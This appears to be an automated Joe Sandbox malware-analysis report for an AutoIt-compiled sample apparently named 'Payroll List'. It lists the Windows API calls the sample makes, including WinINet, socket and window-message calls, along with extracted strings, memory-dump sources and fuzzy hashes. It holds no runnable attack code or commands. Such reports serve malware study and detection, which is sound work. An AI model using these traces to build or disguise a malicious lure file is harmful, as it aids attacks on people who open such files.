                                                                    • UnloadUserProfile.USERENV(?,?), ref: 0015B2EB
                                                                    • CloseHandle.KERNEL32(?), ref: 0015B2F4
                                                                    • CloseHandle.KERNEL32(?), ref: 0015B2FC
                                                                      • Part of subcall function 0015AB24: GetProcessHeap.KERNEL32(00000000,?,0015A848), ref: 0015AB2B
                                                                      • Part of subcall function 0015AB24: HeapFree.KERNEL32(00000000), ref: 0015AB32
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                    • String ID:
                                                                    • API String ID: 146765662-0
                                                                    APIs
                                                                    Similarity
                                                                    • API ID: CapsDesktopDeviceReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 2889604237-0
                                                                    APIs
                                                                    • OleSetContainedObject.OLE32(?,00000001), ref: 0015DEAA
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: ContainedObject
                                                                    • String ID: AutoIt3GUI$Container
                                                                    • API String ID: 3565006973-3941886329
                                                                    APIs
                                                                      • Part of subcall function 0013C6F4: _wcscpy.LIBCMT ref: 0013C717
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • __wcsnicmp.LIBCMT ref: 0016DEFD
                                                                    • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0016DFC6
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                    • String ID: LPT
                                                                    • API String ID: 3222508074-1350329615
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000000), ref: 0013BCDA
                                                                    • GlobalMemoryStatusEx.KERNEL32 ref: 0013BCF3
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: GlobalMemorySleepStatus
                                                                    • String ID: @
                                                                    • API String ID: 2783356886-2766056989
                                                                    APIs
                                                                      • Part of subcall function 001244ED: __fread_nolock.LIBCMT ref: 0012450B
                                                                    • _wcscmp.LIBCMT ref: 0016C65D
                                                                    • _wcscmp.LIBCMT ref: 0016C670
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: _wcscmp$__fread_nolock
                                                                    • String ID: FILE
                                                                    • API String ID: 4029003684-3121273764
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0018A85A
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0018A86F
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: '
                                                                    • API String ID: 3850602802-1997036262
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 00175190
                                                                    • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 001751C6
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: CrackInternet_memset
                                                                    • String ID: |
                                                                    • API String ID: 1413715105-2343686810
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?,?), ref: 0018980E
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0018984A
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: Window$DestroyMove
                                                                    • String ID: static
                                                                    • API String ID: 2139405536-2160076837
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 001651C6
                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00165201
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    APIs
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: __snwprintf
                                                                    • String ID: , $$AUTOITCALLVARIABLE%d
                                                                    • API String ID: 2391506597-2584243854
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0018945C
                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00189467
                                                                    Strings
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: Combobox
                                                                    • API String ID: 3850602802-2096851135
                                                                    APIs
                                                                      • Part of subcall function 0013D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0013D1BA
                                                                      • Part of subcall function 0013D17C: GetStockObject.GDI32(00000011), ref: 0013D1CE
                                                                      • Part of subcall function 0013D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0013D1D8
                                                                    • GetWindowRect.USER32(00000000,?), ref: 00189968
                                                                    • GetSysColor.USER32(00000012), ref: 00189982
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                    • String ID: static
                                                                    • API String ID: 1983116058-2160076837
                                                                    • Opcode ID: 0c2a928b4f1153e8032b619aa88c820a725c669966886f4628d0c4e197c1c132
                                                                    • Instruction ID: f77555065918893d5ec6fa2e7b9e41d2a14cd4016c7fc71bb0a4c3b591780cac
                                                                    • Opcode Fuzzy Hash: 0c2a928b4f1153e8032b619aa88c820a725c669966886f4628d0c4e197c1c132
                                                                    • Instruction Fuzzy Hash: EA11297291020AAFDB04EFB8DC45AFA7BA8FB08354F054619F956E2250E734E950DB50
                                                                    APIs
                                                                    • GetWindowTextLengthW.USER32(00000000), ref: 00189699
                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001896A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: LengthMessageSendTextWindow
                                                                    • String ID: edit
                                                                    • API String ID: 2978978980-2167791130
                                                                    • Opcode ID: 893b3a3ae9dd96b5252924c5b3e88434cdda5afb2f8052342b60a65854967e7d
                                                                    • Instruction ID: 8e9893e04165c5c95d06f5065ea0b5cfa51220e170ab37080dfcc33f083f1efd
                                                                    • Opcode Fuzzy Hash: 893b3a3ae9dd96b5252924c5b3e88434cdda5afb2f8052342b60a65854967e7d
                                                                    • Instruction Fuzzy Hash: AE118C71500108ABEF116FA4EC80EFB3B6AEB15378F644314F965971E0E771DD90AB60
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 001652D5
                                                                    • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 001652F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: InfoItemMenu_memset
                                                                    • String ID: 0
                                                                    • API String ID: 2223754486-4108050209
                                                                    • Opcode ID: f3382a6f787d7d218a086ff02c1e72877cf8a30edf881b2f8f49f5c1de407740
                                                                    • Instruction ID: c8461987689fb20e9fcefa0871f4f5dc3d7ae2bdfd6b36c1908a7519e4476717
                                                                    • Opcode Fuzzy Hash: f3382a6f787d7d218a086ff02c1e72877cf8a30edf881b2f8f49f5c1de407740
                                                                    • Instruction Fuzzy Hash: 73110476D01614EBDB24DF98DD44F9D77BABB05B54F050025E902E72A0D3B0ED54CB90
                                                                    APIs
                                                                    • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00174DF5
                                                                    • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00174E1E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$OpenOption
                                                                    • String ID: <local>
                                                                    • API String ID: 942729171-4266983199
                                                                    • Opcode ID: 294c71bd30d5da078d5d95bf159955d05ab2cd6d907cc2f13f69babcab342b6c
                                                                    • Instruction ID: 59880a5bc04d4ecbcf1afa0201ef80dbfbbcfa56ac0ee022b07eaa032107ca59
                                                                    • Opcode Fuzzy Hash: 294c71bd30d5da078d5d95bf159955d05ab2cd6d907cc2f13f69babcab342b6c
                                                                    • Instruction Fuzzy Hash: FA117C70601621BBDB398FA1C889EFBFAB8FF26765F10C22AF55996540D7705980C6E0
                                                                    APIs
                                                                    • inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0017A84E
                                                                    • htons.WSOCK32(00000000,?,00000000), ref: 0017A88B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: htonsinet_addr
                                                                    • String ID: 255.255.255.255
                                                                    • API String ID: 3832099526-2422070025
                                                                    • Opcode ID: 0c48d8155caa73339e30ec6df5c52e87112800bb412d2e699ec05d50697e1823
                                                                    • Instruction ID: 58ccad3a659abd75d038afb0bd3f80adfd5aca767f21a6ed7bcaaebbba43e0fa
                                                                    • Opcode Fuzzy Hash: 0c48d8155caa73339e30ec6df5c52e87112800bb412d2e699ec05d50697e1823
                                                                    • Instruction Fuzzy Hash: F0012275200304ABCB14AFA8D88AFADB374EF95314F10C426F91AAB3D1C731E8158792
                                                                    APIs
                                                                    • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 0015B7EF
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: 095214cdc1346b0a5f34b41b67be4c8b4d9cd9858fa7117a19108c3c37eba713
                                                                    • Instruction ID: be4a0335652bca81d44705c94693b5852ee138a8a017c3ba8fb420087a17f416
                                                                    • Opcode Fuzzy Hash: 095214cdc1346b0a5f34b41b67be4c8b4d9cd9858fa7117a19108c3c37eba713
                                                                    • Instruction Fuzzy Hash: 3401D871640128EBCB04EBA4DC529FE3379BF65350704061DF9729B2D1EB70591CCB90
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000180,00000000,?), ref: 0015B6EB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: 8c792ca126edb8d00654866c95c9af5c58a6416012d14c02e69b7587dc45aae0
                                                                    • Instruction ID: a320c686fc81226a60bc81027be79b23e29b1037cd8ac1f61235cc3b8d4b3b2e
                                                                    • Opcode Fuzzy Hash: 8c792ca126edb8d00654866c95c9af5c58a6416012d14c02e69b7587dc45aae0
                                                                    • Instruction Fuzzy Hash: A101A271641014ABDB14EBA4D952AFF73B89F25341F100019F922BB281EBA05E1C8BF5
                                                                    APIs
                                                                    • SendMessageW.USER32(?,00000182,?,00000000), ref: 0015B76C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 3850602802-1403004172
                                                                    • Opcode ID: d87843b25aba5ec68a0d86df050416de07eca5abddd0f4b64158b050d4d8c613
                                                                    • Instruction ID: 7c3e49bad9b23f146f43532afc0168da4a57612e3a22a98538cfb0d5a38c6d3a
                                                                    • Opcode Fuzzy Hash: d87843b25aba5ec68a0d86df050416de07eca5abddd0f4b64158b050d4d8c613
                                                                    • Instruction Fuzzy Hash: 1601D171641114FBDB14EBA4E943EFE73AC9B69341F100019B912B72D2EB605E1D8BB5
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ClassName_wcscmp
                                                                    • String ID: #32770
                                                                    • API String ID: 2292705959-463685578
                                                                    • Opcode ID: ef696b96d197f1c110235498a4b2f612a900a429e92226bb67542e22bdd97750
                                                                    • Instruction ID: 491fc761b0dd3a0a6be71640f50ea28a53f153af79ef229a7b0d360fdc1006cf
                                                                    • Opcode Fuzzy Hash: ef696b96d197f1c110235498a4b2f612a900a429e92226bb67542e22bdd97750
                                                                    • Instruction Fuzzy Hash: 81E0927760432427D710AAA5AC49E8BFBACAB51764F010066B919D7181E760E64187D0
                                                                    APIs
                                                                    • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 0015A63F
                                                                      • Part of subcall function 001413F1: _doexit.LIBCMT ref: 001413FB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Message_doexit
                                                                    • String ID: AutoIt$Error allocating memory.
                                                                    • API String ID: 1993061046-4017498283
                                                                    • Opcode ID: 65d7d0692c17d1daa2474a44cbbf02a47b551f4e2fe094d71daea52c0c397d43
                                                                    • Instruction ID: 0789e5f05c64671c85f4c4c34a5d7a805a941b51f89db8cba8e0d311d1776df8
                                                                    • Opcode Fuzzy Hash: 65d7d0692c17d1daa2474a44cbbf02a47b551f4e2fe094d71daea52c0c397d43
                                                                    • Instruction Fuzzy Hash: 3AD05B313C472873D31436987C1BFC575489F25B65F040026FB4D955D25FE6D99041D9
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 0019ACC0
                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0019AEBD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryFreeLibrarySystem
                                                                    • String ID: WIN_XPe
                                                                    • API String ID: 510247158-3257408948
                                                                    • Opcode ID: 2eb53a4984879575b2799145cc8e9f65d423963cf60797218e8da4d83a6ddd6d
                                                                    • Instruction ID: 6cc781071cc1944d299a3f7fc5cb9806eaa016da3ce6baebc96ff648ea5119dd
                                                                    • Opcode Fuzzy Hash: 2eb53a4984879575b2799145cc8e9f65d423963cf60797218e8da4d83a6ddd6d
                                                                    • Instruction Fuzzy Hash: 56E06DB0C00509DFCF15DBA4E984AECFBB8AF58300F518082E002B6960CB704A88DF62
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001886A2
                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 001886B5
                                                                      • Part of subcall function 00167A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00167AD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: bf0f3eaf630e72a740b6a459a25c1c1b2045f13118f38551d76608fecaf27e18
                                                                    • Instruction ID: 8227bab167cac840927cca5c02cce4bd1c033fb8f017a0baed27f342e00609bb
                                                                    • Opcode Fuzzy Hash: bf0f3eaf630e72a740b6a459a25c1c1b2045f13118f38551d76608fecaf27e18
                                                                    • Instruction Fuzzy Hash: 19D02231384314B7F2686370BC0BFC63A189B00B10F000805B30AAA5C0CAE0E980C720
                                                                    APIs
                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 001886E2
                                                                    • PostMessageW.USER32(00000000), ref: 001886E9
                                                                      • Part of subcall function 00167A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00167AD0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: FindMessagePostSleepWindow
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 529655941-2988720461
                                                                    • Opcode ID: f8a1d517fe52bf165a70f30095705967159012ef5b957525f7c1da903bbe70a3
                                                                    • Instruction ID: e0e522ec21c4833b4ebfbcfa6f33ce506e5797463369332d68b5cea5ae13e945
                                                                    • Opcode Fuzzy Hash: f8a1d517fe52bf165a70f30095705967159012ef5b957525f7c1da903bbe70a3
                                                                    • Instruction Fuzzy Hash: 96D022313803147BF2686370BC0BFC63A189B05B10F000805B30AEA5C0CAE0E980C724